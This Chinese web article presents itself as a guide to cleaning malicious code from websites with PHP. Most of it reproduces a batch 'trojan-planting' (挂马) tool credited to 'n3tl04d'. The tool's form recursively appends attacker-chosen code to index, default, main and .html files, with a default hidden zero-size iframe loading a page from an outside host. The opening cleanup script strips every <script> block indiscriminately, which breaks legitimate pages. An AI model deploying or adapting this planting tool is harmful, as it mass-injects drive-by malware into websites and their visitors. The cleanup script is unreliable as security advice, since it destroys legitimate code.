揭秘批量清马利器:PHP脚本如何高效清除恶意代码?
PHP脚本清除恶意代码的基本原理是遍历网站目录,查找并删除或修改含有恶意代码的文件。以下是一个简单的PHP脚本示例:
<?php
// 定义要遍历的目录
$dir = './';
// 遍历目录
function clearMaliciousCode($dir) {
$files = scandir($dir);
foreach ($files as $file) {
if ($file != '.' && $file != '..') {
$filePath = $dir . '/' . $file;
if (is_dir($filePath)) {
clearMaliciousCode($filePath);
} elseif (is_file($filePath)) {
// 读取文件内容
$content = file_get_contents($filePath);
// 检测并清除恶意代码
$content = preg_replace('/<script.*?>.*?<\/script>/i', '', $content);
file_put_contents($filePath, $content);
}
}
}
}
clearMaliciousCode($dir);
?>
php下批量挂马和批量清马代码?
<?php
function gmfun($path=”.”)
{
$d = @dir($path);
while(false !== ($v = $d->read())) {
if($v == “.” || $v == “..”) continue;
$file = $d->path.”/”.$v;
if(@is_dir($file)) {
gmfun($file);
} else {
if(@ereg(stripslashes($_POST["key"]),$file)) {
$mm=stripcslashes( trim( $_POST[mm] ) );
$handle = @fopen (”$file”, “a”);
@fwrite($handle, “$mm”);
@fclose($handle);
echo “已挂马文件:$file\n<br>”; }
}
}
$d->close();
echo ” “;
}
function qmfun($path=”.”)
{
$d = @dir($path);
while(false !== ($v = $d->read())) {
if($v == “.” || $v == “..”) continue;
$file = $d->path.”/”.$v;
if(@is_dir($file)) {
qmfun($file);
} else {
if(@ereg(stripslashes($_POST["key"]),$file)) {
$mm=stripcslashes( trim( $_POST[mm] ) );
$handle = fopen (”$file”, “rb”);
$oldcontent=fread($handle,filesize($file));
fclose($handle);
$newcontent=str_replace($mm,””,$oldcontent);
$fw = fopen (”$file”, “wb”);
fwrite($fw,$newcontent,strlen($newcontent));
fclose($fw);
echo “已清马文件:$file\n<br>”;
}
}
}
$d->close();
echo ” “;
}
if ($_GET['action']=='gm') {
set_time_limit(0);
gmfun($_POST["dir"]);
}
if ($_GET['action']=='qm') {
set_time_limit(0);
qmfun($_POST["dir"]);
}
?>
<title>批量挂马(清马)程序php版</title><body>
<form action=”<?$PHP_SELF?>?action=gm” method=”post”>
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>网站批量挂马程序php版
BY n3tl04d</font></div>
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径)
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>挂马关键字:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value='index\.|default\.|main\.|\.html'>—?正则表达式匹配——
<td colspan=”2″ height=”1″></td>
<td> </tr>
<tr>
<td height=”25″ bgcolor=”#CCCCCC”>想写入的挂马代码:</td>
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value='<iframe src=http://982.9966.org/b073399/b07.htm width=0 height=0 frameborder=0></iframe>'>
<td> </tr>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”>
<input type=”submit” name=”Submit” value=”提交”>
<input type=”reset” name=”Submit2″ value=”重置”>
</div></td>
<td> </tr>
</table>
</form>
<form action=”<?$PHP_SELF?>?action=qm” method=”post”>
<table border=”0″ align=”center” cellpadding=”0″ cellspacing=”0″>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”><font color=”#00FF00″ size=”4″>批量清马工具php版
BY frpkj.com</font></div>
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>路径:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”dir” type=”text” value=”.”>(可填相对路径)
<td> </tr>
<tr>
<td height=”27″ bgcolor=”#CCCCCC”>清马关键字:</td>
<td height=”27″ bgcolor=”#CCCCCC”> <input name=”key” type=”text” value='index\.|default\.|main\.|\.html'>—?正则表达式匹配——
<td colspan=”2″ height=”1″></td>
<td> </tr>
<tr>
<td height=”25″ bgcolor=”#CCCCCC”>想清除的挂马代码:</td>
<td height=”25″ bgcolor=”#CCCCCC”><input name=”mm” type=”text” size=”50″ value='<iframe src=/%6A%6A%32.htm width=50 height=0 frameborder=0></iframe>'>
<td> </tr>
<tr>
<td height=”25″ colspan=”2″ bgcolor=”006699″> <div align=”center”>
<input type=”submit” name=”Submit” value=”提交”>
<input type=”reset” name=”Submit2″ value=”重置”>
</div></td>
<td> </tr>
</table>
</form>
